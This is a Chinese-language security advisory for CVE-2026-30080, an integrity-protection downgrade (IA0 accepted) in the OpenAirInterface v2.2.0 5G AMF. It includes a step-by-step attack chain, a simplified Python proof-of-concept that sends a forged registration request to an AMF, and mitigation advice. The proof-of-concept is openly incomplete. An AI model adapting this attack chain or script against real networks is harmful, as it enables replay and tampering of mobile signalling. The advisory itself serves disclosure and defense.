CVE-2026-30080 OpenAirInterface安全绕过漏洞

漏洞信息

漏洞编号

CVE-2026-30080

漏洞类型

安全绕过

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenAirInterface

漏洞概述

OpenAirInterface v2.2.0存在安全绕过漏洞。该漏洞源于AMF组件未能正确执行完整性保护策略。当UE发送仅包含IA0（无完整性保护）安全能力的初始注册请求时，系统错误地接受了该请求，导致安全上下文被降级。攻击者可利用此漏洞绕过完整性校验，发起重放攻击，威胁网络通信的完整性和安全性。

技术细节

该漏洞位于OpenAirInterface（OAI）5G核心网AMF组件的NAS（非接入层）安全建立机制中。在5G AKA认证流程后，AMF与UE进行安全模式协商以确定加密和完整性保护算法。正常情况下，AMF应优先选择高强度的算法（如NIA1, NIA2）。然而，OAI v2.2.0存在逻辑缺陷，未对UE上报的安全能力进行最小安全基线校验。攻击者可以构造恶意的“Registration Request”消息，将安全能力字段设置为仅支持IA0（NULL-Integrity），即不进行完整性保护。OAI AMF收到该请求后，错误地接受了这种降级配置，并发送未启用完整性保护的“Security Mode Command”。随后的“Security Mode Complete”消息也因此缺乏完整性校验（MAC-I）。由于完整性保护是防止重放攻击的关键机制，其失效意味着攻击者可以捕获合法的NAS消息并在稍后重新发送，或者篡改消息内容而不被检测到，从而破坏5G网络的信令完整性和用户上下文安全。

攻击链分析

STEP 1

信息收集

扫描并识别目标网络中运行的OpenAirInterface AMF服务节点。

STEP 2

降级协商

攻击者模拟UE设备，向AMF发送伪造的初始注册请求，并在安全能力字段中仅声明支持IA0（无完整性保护）。

STEP 3

建立连接

AMF未能拒绝降级请求，接受IA0配置，与攻击者建立起无完整性保护的安全上下文。

STEP 4

重放攻击

利用缺乏完整性校验的漏洞，截获合法的NAS信令消息并在稍后重放，或篡改消息内容以破坏通信完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept: OpenAirInterface Integrity Protection Downgrade
# This script simulates a UE sending a Registration Request with IA0 capability.

import socket

# Simulated NAS payload structure
# In a real scenario, this would be a binary encoded NAS PDU
# 5GS Mobile Identity + Security Capabilities (IA0 only)

nas_payload = bytes.fromhex(
    "7e00"  # Protocol Discriminator: Mobility Management (MM)
    "41"    # Message Type: Registration request
    # ... Mobile Identity (SUCI/SUPI) ...
    # ... Security Capabilities: 00000001 (Bit 0 for IA0, others 0 for NIA1/2/3) ...
    "01"    # UE Security Capability - indicating only IA0 support
)

def send_malicious_registration(amf_ip, amf_port):
    """
    Sends a registration request claiming no integrity support (IA0)
    to exploit the downgrade vulnerability in OAI v2.2.0.
    """
    try:
        # Establish SCTP or TCP connection to AMF (Simplified as TCP here)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((amf_ip, amf_port))
        
        print(f"[*] Sending Registration Request with IA0 only to {amf_ip}...")
        sock.send(nas_payload)
        
        response = sock.recv(4096)
        print(f"[+] Received response from AMF: {response.hex()}")
        
        # Analyze response to check if Security Mode Command allows IA0
        # If accepted, the vulnerability is confirmed.
        
        sock.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Replace with actual target AMF address
    TARGET_AMF_IP = "192.168.56.101" 
    TARGET_AMF_PORT = 38412 # Standard NGAP port (SCTP usually)
    send_malicious_registration(TARGET_AMF_IP, TARGET_AMF_PORT)

影响范围

OpenAirInterface v2.2.0

防御指南

临时缓解措施

建议管理员检查AMF配置，强制启用NIA1或NIA2完整性保护算法，并在代码层面增加对UE安全能力的校验逻辑，确保不接受IA0降级协商，直至应用官方补丁。